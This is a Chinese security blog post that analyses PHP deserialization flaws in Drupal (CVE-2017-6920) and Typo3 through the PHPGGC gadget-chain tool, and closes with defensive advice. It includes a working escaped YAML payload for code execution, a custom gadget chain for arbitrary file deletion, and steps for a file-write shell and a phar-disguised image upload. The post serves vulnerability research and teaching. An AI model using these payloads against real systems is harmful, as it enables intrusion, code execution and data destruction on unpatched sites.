https://kylingit.com/tags/typo3/index.xml Recent content in Typo3 on 诗与胡说 Hugo -- gohugo.io zh_cn Copyright © 2021 Kylinking https://kylingit.com/blog/%E7%94%B1phpggc%E7%90%86%E8%A7%A3php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/ Mon, 08 Oct 2018 14:43:41 +0000 https://kylingit.com/blog/%E7%94%B1phpggc%E7%90%86%E8%A7%A3php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/ <script src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/pangu.js"></script> <h2 id="0x01-概述">0x01 概述</h2> <p><a href="https://github.com/ambionics/phpggc">PHPGGC</a>是一款能够自动生成主流框架的序列化测试<code>payload</code>的工具，类似Java中的<a href="https://github.com/frohoff/ysoserial">ysoserial</a>，当前支持的框架包括<code>Doctrine</code>, <code>Guzzle</code>, <code>Laravel</code>, <code>Magento</code>, <code>Monolog</code>, <code>Phalcon</code>, <code>Slim</code>, <code>SwiftMailer</code>, <code>Symfony</code>, <code>Yii</code> 和 <code>ZendFramework</code>，可以说是反序列化的武器库了。本文从该工具出发，以Drupal Yaml反序列化漏洞和Typo3反序列化漏洞为例，分析其中的多种利用方式，并介绍一下今年BlackHat议题关于新型php反序列化攻击的部分。</p> <h2 id="0x02-drupal-yaml反序列化漏洞">0x02 Drupal Yaml反序列化漏洞</h2> <h3 id="一-介绍">一、介绍</h3> <p>关于<code>Drupal</code>就不过多介绍了，前阵子两个RCE漏洞杀伤力巨大，这次介绍的是去年披露的关于反序列化的漏洞，<a href="https://nvd.nist.gov/vuln/detail/CVE-2017-6920">CVE-2017-6920</a>，官方描述是YAML解析器处理不当导致的一个远程代码执行漏洞</p> <blockquote> <h3 id="pecl-yaml-parser-unsafe-object-handling-critical-drupal-8-cve-2017-6920">PECL YAML parser unsafe object handling - Critical - Drupal 8 - CVE-2017-6920</h3> <p>PECL YAML parser does not handle PHP objects safely during certain operations within Drupal core. This could lead to remote code execution.</p> </blockquote> <p>详情见<a href="https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2017-06-21/drupal-core-multiple">SA-CORE-2017-003</a></p> <h3 id="二-漏洞分析">二、漏洞分析</h3> <p>先来看一下补丁，diff 8.3.3 和 8.3.4 版本，主要修改点在<code>core/lib/Drupal/Component/Serialization/YamlPecl.php</code>文件<code>decode</code>方法</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1538990057077.png" alt="1538990057077" /></p> <p>可见在<code>yaml_parse</code>前进行了<code>ini_set('yaml.decode_php', 0);</code></p> <p>用户可控制的参数<code>$raw</code>直接传给了<code>yaml_parse</code>函数，而在手册上关于<code>yaml_parse</code>函数有这么一个注意点：</p> <blockquote> <p>Warning</p> <p>Processing untrusted user input with yaml_parse() is dangerous if the use of unserialize() is enabled for nodes using the !php/object tag. This behavior can be disabled by using the yaml.decode_php ini setting.</p> </blockquote> <p>也就是说，如果使用了<code>yaml</code>标志<code>!php/object</code>，那么这个内容会通过<code>unserialize()</code>进行处理，设置<code>yaml.decode_php</code>则可以禁止，这就是为什么补丁增加了这行代码。</p> <p>看一下调用<code>decode()</code>方法的地方，<code>core/lib/Drupal/Component/Serialization/Yaml.php</code>：</p> <pre><code class="language-php">public static function decode($raw) { $serializer = static::getSerializer(); return $serializer::decode($raw); } </code></pre> <p>在<code>Yaml</code>类的<code>decode()</code>方法调用了<code>static::getSerializer()</code>方法，跟入</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1538993007544.png" alt="1538993007544" /></p> <p>可以看到加载了<code>yaml</code>扩展后就会进入<code>YamlPecl</code>类，进而调用<code>Yaml::decode()</code>方法，搜索调用<code>Yaml::decode</code>并且参数能被控制的地方，在<code>core/modules/config/src/Form/ConfigSingleImportForm.php</code>的<code>validateForm()</code>方法：</p> <pre><code class="language-php">$data = Yaml::decode($form_state-&gt;getValue('import')); </code></pre> <p><code>validateForm()</code>的调用处在<code>http://127.0.0.1/drupal-8.3.3/admin/config/development/configuration/single/import</code>，<code>decode()</code>的参数直接从表单获取，于是通过<code>import</code>将恶意参数传递进去。</p> <h3 id="三-漏洞利用">三、漏洞利用</h3> <p>现在我们需要找到一个类，使之在被反序列化的时候执行危险函数，常规搜索<code>_destruct</code>、<code>_tostring</code>以及<code>_wakeup</code>方法，在<code>drupal</code>核心中有这么三个类可以被利用，其中两个在<code>phpggc</code>工具中已经集成 ，另一个我们手动加入到<code>phpggc</code>中</p> <h4 id="1-远程代码执行">1. 远程代码执行</h4> <p><code>vendor/guzzlehttp/psr7/src/FnStream.php</code> <code>FnStream</code>类的<code>__destruct()</code>方法</p> <pre><code class="language-php"> public function __destruct() { if (isset($this-&gt;_fn_close)) { call_user_func($this-&gt;_fn_close); } } </code></pre> <p>我们通过序列化这个类，传递参数<code>_fn_close</code>为任意php代码，在<code>yaml_parse</code>的时候反序列化便可以造成一个任意代码执行。</p> <p>在PHPGGC中已经内置这个类，查看信息</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539050117155.png" alt="1539050117155" /></p> <p>看一下内部实现</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539050287387.png" alt="1539050287387" /></p> <p><code>phpggc</code>将<code>_fn_close</code>参数设置为<code>HandlerStack</code>类，再在<code>HandlerStack</code>序列化的时候传入可控参数<code>$handler</code>，而在这个案例中我们不需要额外的<code>HandlerStack</code>类了，所以对<code>generate()</code>方法稍加修改，直接构造一个<code>FnStream</code>类，注意参数是<code>array</code>类型：</p> <pre><code class="language-php">return new \GuzzleHttp\Psr7\FnStream([ 'close' =&gt; $code ]); </code></pre> <p>然后生成序列化数据：</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539050803329.png" alt="1539050803329" /></p> <p>接着拼接<code>YAML_PHP_TAG</code>即<code>!php/object</code>，并且要将字符串转义，注意序列化数据中的空字符，我们将其替换成<code>\0</code>，最终生成的字符串如下：</p> <pre><code class="language-php">!php/object &quot;O:24:\&quot;GuzzleHttp\\Psr7\\FnStream\&quot;:2:{s:33:\&quot;\0GuzzleHttp\\Psr7\\FnStream\0methods\&quot;;a:1:{s:5:\&quot;close\&quot;;s:7:\&quot;phpinfo\&quot;;}s:9:\&quot;_fn_close\&quot;;s:7:\&quot;phpinfo\&quot;;}&quot; </code></pre> <p>在<code>http://127.0.0.1/drupal-8.3.3/admin/config/development/configuration/single/import</code>import序列化后的数据，便可以执行代码</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539051346096.png" alt="1539051346096" /></p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539051456660.png" alt="1539051456660" /></p> <h4 id="2-任意文件写入">2. 任意文件写入</h4> <p>上面<code>call_user_func()</code>造成了一个任意代码执行，我们再找到一个<code>file_put_contents()</code>造成任意文件写入</p> <p>在<code>vendor/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php</code>的<code>FileCookieJar</code>类</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539051809132.png" alt="1539051809132" /></p> <p><code>__destruct()</code>调用<code>save()</code>方法，通过<code>file_put_contents()</code>写入文件内容，而文件名和文件内容均是我们可以控制的，所以此处可以写入一个shell</p> <p>同样地看一下<code>phpggc</code>中有关<code>FileCookieJar</code>类的部分：<code>gadgetchains/Guzzle/FW/1/chain.php</code></p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539052187458.png" alt="1539052187458" /></p> <p>通过这个类生成序列化数据</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539052263375.png" alt="1539052263375" /></p> <p>需要提供远程文件路径和本地文件路径两个参数</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539052815893.png" alt="1539052815893" /></p> <p>接着还是拼接和转义，并import数据</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539052742894.png" alt="1539052742894" /></p> <p>写入的是整个json字符串，但是不影响代码执行。</p> <h4 id="3-任意文件删除">3. 任意文件删除</h4> <p>另一个类是<code>WindowsPipes</code>，路径<code>vendor/symfony/process/Pipes/WindowsPipes.php</code>，该类可以造成文件删除</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539053196182.png" alt="1539053196182" /></p> <p>在<code>phpggc</code>中没有内置这个类，于是我们按照这个工具的框架来实现一下，方便理解该工具。</p> <p>在<code>lib/PHPGGC/GadgetChain.php</code>已经有<code>TYPE_FD</code>这个类型，代表<code>file_delete</code>，那么我们直接在<code>lib/PHPGGC/GadgetChain/</code>注册一个<code>FileDelete</code></p> <pre><code class="language-php">&lt;?php namespace PHPGGC\GadgetChain; abstract class FileDelete extends \PHPGGC\GadgetChain { public static $type = self::TYPE_FD; public $parameters = [ 'file_name' ]; } </code></pre> <p>这个类就可以作为POP链拿来使用了</p> <p>然后在<code>Symfony</code>目录下创建<code>RMF/1</code>，并创建<code>chain</code>和<code>gadgets</code></p> <p><code>gadgetchains/Symfony/RMF/1/chain.php</code></p> <pre><code class="language-php">&lt;?php namespace GadgetChain\Symfony; class RMF1 extends \PHPGGC\GadgetChain\FileDelete { public $version = '2.6 &lt;= 2.8.32'; public $vector = '__destruct'; public $author = 'crlf'; public $informations = 'Remove remote file.'; public function generate(array $parameters) { $input = $parameters['file_name']; return new \Symfony\Component\Process\Pipes\WindowsPipes($input); } } </code></pre> <p><code>gadgetchains/Symfony/RMF/1/gadgets.php</code></p> <pre><code class="language-php">&lt;?php namespace Symfony\Component\Process\Pipes; class WindowsPipes { private $files = array(); public function __construct($input) { $this-&gt;files = array($input); } } </code></pre> <p>我们直接生成<code>WindowsPipes</code>的序列化数据，把文件名作为参数传入，在反序列化的时候自动调用<code>removeFiles()</code>，实现任意文件删除</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539053814915.png" alt="1539053814915" /></p> <p>生成序列化字符串</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539053942995.png" alt="1539053942995" /></p> <p>import后文件被删除</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539054380813.png" alt="1539054380813" /></p> <h3 id="四-总结">四、总结</h3> <p>通过这个漏洞对<code>phpggc</code>工具有了一定了解，我们可以添加自定义<code>POP</code>链到工具中，用来丰富这个武器库。</p> <p>另外针对这个漏洞，文件写入和文件删除都需要知道网站的绝对路径，加上需要登录后才能利用，一定程度上加大了利用难度。</p> <h2 id="0x03-typo3反序列化漏洞">0x03 Typo3反序列化漏洞</h2> <h3 id="一-介绍-1">一、介绍</h3> <p><code>Typo3</code>也是一款著名的CMS，但是在国内流行程度不如<code>Wordpress</code>。这个漏洞是今年<code>BlackHat</code>大会上由<code>Sam Thomas</code>分享反序列化漏洞议题时作为案例来讲的，该漏洞由<code>phar://</code>触发，这是一个新型的反序列化利用方式，日常开发中容易忽略这个风险点，在漏洞利用中也用到了<code>phpggc</code>这个工具，所以一并学习。</p> <p>关于该漏洞的官方描述，可以看<a href="https://typo3.org/security/advisory/typo3-core-sa-2018-002/">这里</a></p> <h3 id="二-phar-介绍">二、phar://介绍</h3> <p>在分析漏洞前先介绍一下<code>phar://</code>伪协议，直接看php手册的<a href="http://php.net/manual/en/intro.phar.php">介绍</a></p> <blockquote> <p>Phar archives are best characterized as a convenient way to group several files into a single file. As such, a phar archive provides a way to distribute a complete PHP application in a single file and run it from that file without the need to extract it to disk. Additionally, phar archives can be executed by PHP as easily as any other file, both on the commandline and from a web server. Phar is kind of like a thumb drive for PHP applications.</p> </blockquote> <p>简单来说<code>phar</code>就是<code>php</code>压缩文档。它可以把多个文件归档到同一个文件中，而且不经过解压就能被php访问并执行，与<code>file://</code> <code>php://</code>等类似，也是一种流包装器。</p> <p><code>phar</code>结构由4部分组成</p> <ul> <li><code>stub</code> phar文件标识，格式为 <code>xxx&lt;?php xxx; __HALT_COMPILER();?&gt;；</code></li> <li><code>manifest</code> 压缩文件的属性等信息，以<strong>序列化</strong>存储；</li> <li><code>contents</code> 压缩文件的内容；</li> <li><code>signature</code> 签名，放在文件末尾；</li> </ul> <p>这里有两个关键点，一是文件标识，必须以<code>__HALT_COMPILER();?&gt;</code>结尾，但前面的内容没有限制，也就是说我们可以轻易伪造一个图片文件或者<code>pdf</code>文件来绕过一些上传限制；二是反序列化，<code>phar</code>存储的<code>meta-data</code>信息以序列化方式存储，当文件操作函数通过<code>phar://</code>伪协议解析<code>phar</code>文件时就会将数据反序列化，而这样的文件操作函数有很多，包括下面这些：</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539063733837.png" alt="1539063733837" /></p> <p>图片来自<a href="https://paper.seebug.org/680/">seebug</a></p> <p>这中间大多数是常用的函数，在一个系统中使用相当广泛，结合文件伪造，使得通过<code>phar://</code>解析造成的反序列化攻击变得愈加容易。</p> <h3 id="三-漏洞分析">三、漏洞分析</h3> <p>接下来看一下Typo3中存在漏洞的代码</p> <p>在<code>typo3/sysext/core/Classes/Database/SoftReferenceIndex.php</code>的<code>getTypoLinkParts()</code>方法</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539064169518.png" alt="1539064169518" /></p> <p>上面说到存在风险的文件操作函数，其中就包括<code>file_exists()</code>，当传给<code>file_exists()</code>的参数是<code>phar</code>压缩文档并通过<code>phar://</code>伪协议解析时，就会反序列化其中的<code>metadata</code>数据，一旦该数据被控制，就会形成漏洞。</p> <p>下面举一个例子演示</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539064567894.png" alt="1539064567894" /></p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539064633273.png" alt="1539064633273" /></p> <p>可以看到通过<code>file_exists()</code>函数判断文件是否存在即对<code>TestObject</code>类进行了反序列化。</p> <p>那么我们可以构造<code>$splitLinkParam</code>参数为<code>phar</code>文件，其中包含恶意代码，传递给<code>file_exists()</code>函数，便会触发漏洞。</p> <h3 id="四-漏洞利用">四、漏洞利用</h3> <p><a href="https://github.com/s-n-t/phpggc">pharggc</a>是在<code>phpggc</code>的基础上增加了对<code>phar</code>的支持，能够将序列化后的<code>payload</code>写入到<code>phar</code>文件中，通过<code>phar://</code>解析时触发<code>payload</code></p> <p>我们已经找到可以触发漏洞的地方，但还需要一个类来执行代码，在Typo3中同样存在<code>FnStream</code>类，所以我们还是使用<code>guzzle/rce1</code>载荷将数据写入一张图片中</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539065928944.png" alt="1539065928944" /></p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539065937046.png" alt="1539065937046" /></p> <p>然后上传这个附件，接着创建一个页面，将Link设置为<code>phar://</code>，注意需要将<code>:</code>转义</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539067380611.png" alt="1539067380611" /></p> <p>保存后就会触发漏洞</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539067384583.png" alt="1539067384583" /></p> <p>调用栈如下图所示</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1539070664504.png" alt="1539070664504" /></p> <h3 id="五-总结及防御">五、总结及防御</h3> <p>这个漏洞利用的是<code>phar</code>的特性，在系统未过滤<code>phar://</code>协议且参数可以控制时，容易引发漏洞，开发时也需要多注意限制使用不必要的流包装器，上传文件也要校验文件内容而不仅仅是文件头。</p> <p>防范措施</p> <ul> <li>限制PHP流包装器的使用(传递)；</li> <li>控制文件操作函数的参数，过滤特殊字符，例如 phar:// 等；</li> <li>仅在特别请求时才对元数据进行反序列化；</li> </ul> <h2 id="0x04-总结">0x04 总结</h2> <p>本文分析了两个漏洞，并结合<code>phpggc</code>工具梳理了反序列化漏洞常见的攻击方式，以及如何寻找一条可以利用的POP链，也提到了开发中容易忽略的安全风险，希望能给大家起到帮助。</p> <p>参考：</p> <p><a href="https://paper.seebug.org/334/">https://paper.seebug.org/334/</a></p> <p><a href="https://paper.seebug.org/680">https://paper.seebug.org/680</a></p> <p><a href="https://github.com/ambionics/phpggc">https://github.com/ambionics/phpggc</a></p> <p><a href="https://github.com/s-n-t/phpggc">https://github.com/s-n-t/phpggc</a></p> <p><a href="http://php.net/manual/en/function.yaml-parse.php">http://php.net/manual/en/function.yaml-parse.php</a></p> <p><a href="http://php.net/manual/en/intro.phar.php">http://php.net/manual/en/intro.phar.php</a></p> <p><a href="https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2017-06-21/drupal-core-multiple">https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2017-06-21/drupal-core-multiple</a></p> <p><a href="https://typo3.org/security/advisory/typo3-core-sa-2018-002/">https://typo3.org/security/advisory/typo3-core-sa-2018-002/</a></p> <script>pangu.spacingPage();</script>